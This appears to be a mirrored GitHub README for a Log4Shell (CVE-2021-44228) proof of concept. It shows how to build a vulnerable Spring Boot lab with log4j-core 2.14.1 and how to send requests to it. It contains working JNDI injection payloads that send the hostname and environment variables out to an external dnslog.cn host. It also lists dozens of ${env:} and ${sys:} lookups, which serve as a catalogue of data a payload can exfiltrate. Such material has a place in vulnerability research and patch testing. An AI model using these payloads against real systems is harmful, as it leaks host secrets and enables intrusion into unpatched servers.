Git Product home page Git Product logo

log4j2-cve-2021-44228's Introduction

CVE-2021-44228 Remote Code Injection In Log4j

https://twitter.com/jas502n/status/1468946197629272066

image

SpringBoot-pom.xml

default use :

<dependency>
    <groupId>org.springframework.boot</groupId>
    <artifactId>spring-boot-starter-web</artifactId>
</dependency>

mvn dependency:tree

[INFO] |  |  +- org.springframework.boot:spring-boot-starter-logging:jar:2.6.1:compile
[INFO] |  |  |  +- ch.qos.logback:logback-classic:jar:1.2.7:compile
[INFO] |  |  |  |  \- ch.qos.logback:logback-core:jar:1.2.7:compile
[INFO] |  |  |  +- org.apache.logging.log4j:log4j-to-slf4j:jar:2.14.1:compile
[INFO] |  |  |  \- org.slf4j:jul-to-slf4j:jar:1.7.32:compile  
[INFO] |  |  \- org.slf4j:slf4j-api:jar:1.7.32:compile

change pom.xml

<dependency>
    <groupId>org.springframework.boot</groupId>
    <artifactId>spring-boot-starter-web</artifactId>
    <exclusions>
        <exclusion>
            <groupId>org.springframework.boot</groupId>
            <artifactId>spring-boot-starter-logging</artifactId>
        </exclusion>
    </exclusions>
</dependency>

<dependency>
    <groupId>org.apache.logging.log4j</groupId>
    <artifactId>log4j-core</artifactId>
    <version>2.14.1</version>
</dependency>

漏洞环境使用

usage: image

$ java -jar log4jRCE-0.0.1-SNAPSHOT.jar    

[*] CVE-2021-44228 Log4j2 Remote Code Injection

  .   ____          _            __ _ _
 /\\ / ___'_ __ _ _(_)_ __  __ _ \ \ \ \
( ( )\___ | '_ | '_| | '_ \/ _` | \ \ \ \
 \\/  ___)| |_)| | | | | || (_| |  ) ) ) )
  '  |____| .__|_| |_|_| |_\__, | / / / /
 =========|_|==============|___/=/_/_/_/
 :: Spring Boot ::                (v2.6.1)

2021-12-10 16:18:43.099  WARN 48536 --- [           main] o.s.boot.StartupInfoLogger               : InetAddress.getLocalHost().getHostName() took 5005 milliseconds to respond. Please verify your network configuration (macOS machines may need to add entries to /etc/hosts).
2021-12-10 16:18:48.108  INFO 48536 --- [           main] c.example.log4jrce.Log4jRceApplication   : Starting Log4jRceApplication v0.0.1-SNAPSHOT using Java 1.8.0_60 on JMacBookPro.local with PID 48536 (/Users/jas502n/IdeaProjects/log4jRCE/target/log4jRCE-0.0.1-SNAPSHOT.jar started by root in log4jRCE/target)
2021-12-10 16:18:48.109  INFO 48536 --- [           main] c.example.log4jrce.Log4jRceApplication   : No active profile set, falling back to default profiles: default
2021-12-10 16:18:48.890  INFO 48536 --- [           main] o.s.b.w.embedded.tomcat.TomcatWebServer  : Tomcat initialized with port(s): 8080 (http)
2021-12-10 16:18:48.902  INFO 48536 --- [           main] o.apache.catalina.core.StandardService   : Starting service [Tomcat]
2021-12-10 16:18:48.902  INFO 48536 --- [           main] org.apache.catalina.core.StandardEngine  : Starting Servlet engine: [Apache Tomcat/9.0.55]
2021-12-10 16:18:48.957  INFO 48536 --- [           main] o.a.c.c.C.[Tomcat].[localhost].[/]       : Initializing Spring embedded WebApplicationContext

Burpsuite Send

image

POST /login HTTP/1.1
Host: 127.0.0.1:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 52

data=xxxxx

HTTP/1.1 200 
Content-Type: text/html;charset=UTF-8
Content-Length: 15
Date: Fri, 10 Dec 2021 08:38:50 GMT
Connection: close

log4j2 success!

Fix log4j2 Tips By Default Properites

默认 Map 预先填充了 hostName 的值,该值是当前系统的主机名或IP地址,

参考文档:https://www.docs4dev.com/docs/zh/log4j2/2.x/all/manual-configuration.html

org.apache.logging.log4j.core.LoggerContext#setConfiguration

image image

${hostName}
${env:COMPUTERNAME}
${env:USERDOMAIN}
${env:LOGONSERVER}

Example:

// log4j2 Default,For(Windows、Linux、macOS....)
${jndi:dns://${hostName}.iwk5r1.dnslog.cn}

// Equivalent to windows command(set|findstr your-hostname)
${jndi:dns://${env:COMPUTERNAME}.iwk5r1.dnslog.cn}
${jndi:dns://${env:USERDOMAIN}.iwk5r1.dnslog.cn}

image

log4j-java

ID usage method
1 ${java:version} getSystemProperty("java.version")
2 ${java:runtime} getRuntime()
3 ${java:vm} getVirtualMachine()
4 ${java:os} getOperatingSystem()
5 ${java:hw} getHardware()
6 ${java:locale} getLocale()

org.apache.logging.log4j.core.lookup.JavaLookup

    public String getHardware() {
        return "processors: " + Runtime.getRuntime().availableProcessors() + ", architecture: " + this.getSystemProperty("os.arch") + this.getSystemProperty("-", "sun.arch.data.model") + this.getSystemProperty(", instruction sets: ", "sun.cpu.isalist");
    }

    public String getLocale() {
        return "default locale: " + Locale.getDefault() + ", platform encoding: " + this.getSystemProperty("file.encoding");
    }

    public String getOperatingSystem() {
        return this.getSystemProperty("os.name") + " " + this.getSystemProperty("os.version") + this.getSystemProperty(" ", "sun.os.patch.level") + ", architecture: " + this.getSystemProperty("os.arch") + this.getSystemProperty("-", "sun.arch.data.model");
    }

    public String getRuntime() {
        return this.getSystemProperty("java.runtime.name") + " (build " + this.getSystemProperty("java.runtime.version") + ") from " + this.getSystemProperty("java.vendor");
    }

    private String getSystemProperty(final String name) {
        return this.spLookup.lookup(name);
    }

    public String getVirtualMachine() {
        return this.getSystemProperty("java.vm.name") + " (build " + this.getSystemProperty("java.vm.version") + ", " + this.getSystemProperty("java.vm.info") + ")";
    }
log4j2-env
Linux:
CLASSPATH,HOME,JAVA_HOME,LANG,LC_TERMINAL,LC_TERMINAL_VERSION,LESS,LOGNAME,LSCOLORS,LS_COLORS,MAIL,NLSPATH,OLDPWD,PAGER,PATH,PWD,SHELL,SHLVL,SSH_CLIENT,SSH_CONNECTION,SSH_TTY,TERM,USER,XDG_RUNTIME_DIR,XDG_SESSION_ID,XFILESEARCHPATH,ZSH,_
id usage
1 ${env:CLASSPATH}
2 ${env:HOME}
3 ${env:JAVA_HOME}
4 ${env:LANG}
5 ${env:LC_TERMINAL}
6 ${env:LC_TERMINAL_VERSION}
7 ${env:LESS}
8 ${env:LOGNAME}
9 ${env:LSCOLORS}
10 ${env:LS_COLORS}
11 ${env:MAIL}
12 ${env:NLSPATH}
13 ${env:OLDPWD}
14 ${env:PAGER}
15 ${env:PATH}
16 ${env:PWD}
17 ${env:SHELL}
18 ${env:SHLVL}
19 ${env:SSH_CLIENT}
20 ${env:SSH_CONNECTION}
21 ${env:SSH_TTY}
22 ${env:TERM}
23 ${env:USER}
24 ${env:XDG_RUNTIME_DIR}
25 ${env:XDG_SESSION_ID}
26 ${env:XFILESEARCHPATH}
27 ${env:ZSH}
Windows:
=E:,=ExitCode,A8_HOME,A8_ROOT_BIN,ALLUSERSPROFILE,APPDATA,CATALINA_BASE,CATALINA_HOME,CATALINA_OPTS,CATALINA_TMPDIR,CLASSPATH,CLIENTNAME,COMPUTERNAME,ComSpec,CommonProgramFiles,CommonProgramFiles(x86),CommonProgramW6432,FP_NO_HOST_CHECK,HOMEDRIVE,HOMEPATH,JRE_HOME,Java_Home,LOCALAPPDATA,LOGONSERVER,NUMBER_OF_PROCESSORS,OS,PATHEXT,PROCESSOR_ARCHITECTURE,PROCESSOR_IDENTIFIER,PROCESSOR_LEVEL,PROCESSOR_REVISION,PROMPT,PSModulePath,PUBLIC,Path,ProgramData,ProgramFiles,ProgramFiles(x86),ProgramW6432,SESSIONNAME,SystemDrive,SystemRoot,TEMP,TMP,ThisExitCode,USERDOMAIN,USERNAME,USERPROFILE,WORK_PATH,windir,windows_tracing_flags,windows_tracing_logfile
id usage
1 ${env:A8_HOME}
2 ${env:A8_ROOT_BIN}
3 ${env:ALLUSERSPROFILE}
4 ${env:APPDATA}
5 ${env:CATALINA_BASE}
6 ${env:CATALINA_HOME}
7 ${env:CATALINA_OPTS}
8 ${env:CATALINA_TMPDIR}
9 ${env:CLASSPATH}
10 ${env:CLIENTNAME}
11 ${env:COMPUTERNAME}
12 ${env:ComSpec}
13 ${env:CommonProgramFiles}
14 ${env:CommonProgramFiles(x86)}
15 ${env:CommonProgramW6432}
16 ${env:FP_NO_HOST_CHECK}
17 ${env:HOMEDRIVE}
18 ${env:HOMEPATH}
19 ${env:JRE_HOME}
20 ${env:Java_Home}
21 ${env:LOCALAPPDATA}
22 ${env:LOGONSERVER}
23 ${env:NUMBER_OF_PROCESSORS}
24 ${env:OS}
25 ${env:PATHEXT}
26 ${env:PROCESSOR_ARCHITECTURE}
27 ${env:PROCESSOR_IDENTIFIER}
28 ${env:PROCESSOR_LEVEL}
29 ${env:PROCESSOR_REVISION}
30 ${env:PROMPT}
31 ${env:PSModulePath}
32 ${env:PUBLIC}
33 ${env:Path}
34 ${env:ProgramData}
35 ${env:ProgramFiles}
36 ${env:ProgramFiles(x86)}
37 ${env:ProgramW6432}
38 ${env:SESSIONNAME}
39 ${env:SystemDrive}
40 ${env:SystemRoot}
41 ${env:TEMP}
42 ${env:TMP}
43 ${env:ThisExitCode}
44 ${env:USERDOMAIN}
45 ${env:USERNAME}
46 ${env:USERPROFILE}
47 ${env:WORK_PATH}
48 ${env:windir}
49 ${env:windows_tracing_flags}
50 ${env:windows_tracing_logfile}
Mac:
ANT_HOME,COMMAND_MODE,GOBIN,GOPATH,GOROOT,GRADLE_HOME,HOME,HOMEBREW_BOTTLE_DOMAIN,JAVA_HOME,JAVA_MAIN_CLASS_3651,LC_CTYPE,LESS,LOGNAME,LSCOLORS,LaunchInstanceID,OLDPWD,PAGER,PATH,PWD,SECURITYSESSIONID,SHELL,SSH_AUTH_SOCK,TIME_STYLE,TMPDIR,USER,VERSIONER_PYTHON_VERSION,XPC_FLAGS,XPC_SERVICE_NAME,ZSH,__CF_USER_TEXT_ENCODING
id usage
1 ${env:ANT_HOME}
2 ${env:COMMAND_MODE}
3 ${env:GOBIN}
4 ${env:GOPATH}
5 ${env:GOROOT}
6 ${env:GRADLE_HOME}
7 ${env:HOME}
8 ${env:HOMEBREW_BOTTLE_DOMAIN}
9 ${env:JAVA_HOME}
10 ${env:JAVA_MAIN_CLASS_3651}
11 ${env:LC_CTYPE}
12 ${env:LESS}
13 ${env:LOGNAME}
14 ${env:LSCOLORS}
15 ${env:LaunchInstanceID}
16 ${env:OLDPWD}
17 ${env:PAGER}
18 ${env:PATH}
19 ${env:PWD}
20 ${env:SECURITYSESSIONID}
21 ${env:SHELL}
22 ${env:SSH_AUTH_SOCK}
23 ${env:TIME_STYLE}
24 ${env:TMPDIR}
25 ${env:USER}
26 ${env:VERSIONER_PYTHON_VERSION}
27 ${env:XPC_FLAGS}
28 ${env:XPC_SERVICE_NAME}
29 ${env:ZSH}
log4j2-sys
id usage
1 ${sys:awt.toolkit}
2 ${sys:file.encoding}
3 ${sys:file.encoding.pkg}
4 ${sys:file.separator}
5 ${sys:java.awt.graphicsenv}
6 ${sys:java.awt.printerjob}
7 ${sys:java.class.path}
8 ${sys:java.class.version}
9 ${sys:java.endorsed.dirs}
10 ${sys:java.ext.dirs}
11 ${sys:java.home}
12 ${sys:java.io.tmpdir}
13 ${sys:java.library.path}
14 ${sys:java.runtime.name}
15 ${sys:java.runtime.version}
16 ${sys:java.specification.name}
17 ${sys:java.specification.vendor}
18 ${sys:java.specification.version}
19 ${sys:java.vendor}
20 ${sys:java.vendor.url}
21 ${sys:java.vendor.url.bug}
22 ${sys:java.version}
23 ${sys:java.vm.info}
24 ${sys:java.vm.name}
25 ${sys:java.vm.specification.name}
26 ${sys:java.vm.specification.vendor}
27 ${sys:java.vm.specification.version}
28 ${sys:java.vm.vendor}
29 ${sys:java.vm.version}
30 ${sys:line.separator}
31 ${sys:os.arch}
32 ${sys:os.name}
33 ${sys:os.version}
34 ${sys:path.separator}
35 ${sys:sun.arch.data.model}
36 ${sys:sun.boot.class.path}
37 ${sys:sun.boot.library.path}
38 ${sys:sun.cpu.endian}
39 ${sys:sun.cpu.isalist}
40 ${sys:sun.desktop}
41 ${sys:sun.io.unicode.encoding}
42 ${sys:sun.java.command}
43 ${sys:sun.java.launcher}
44 ${sys:sun.jnu.encoding}
45 ${sys:sun.management.compiler}
46 ${sys:sun.os.patch.level}
47 ${sys:sun.stderr.encoding}
48 ${sys:user.country}
49 ${sys:user.dir}
50 ${sys:user.home}
51 ${sys:user.language}
52 ${sys:user.name}
53 ${sys:user.script}
54 ${sys:user.timezone}
55 ${sys:user.variant}

log4j2-cve-2021-44228's People

Contributors

jas502n avatar

Watchers

James Cloos avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google ❤️ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.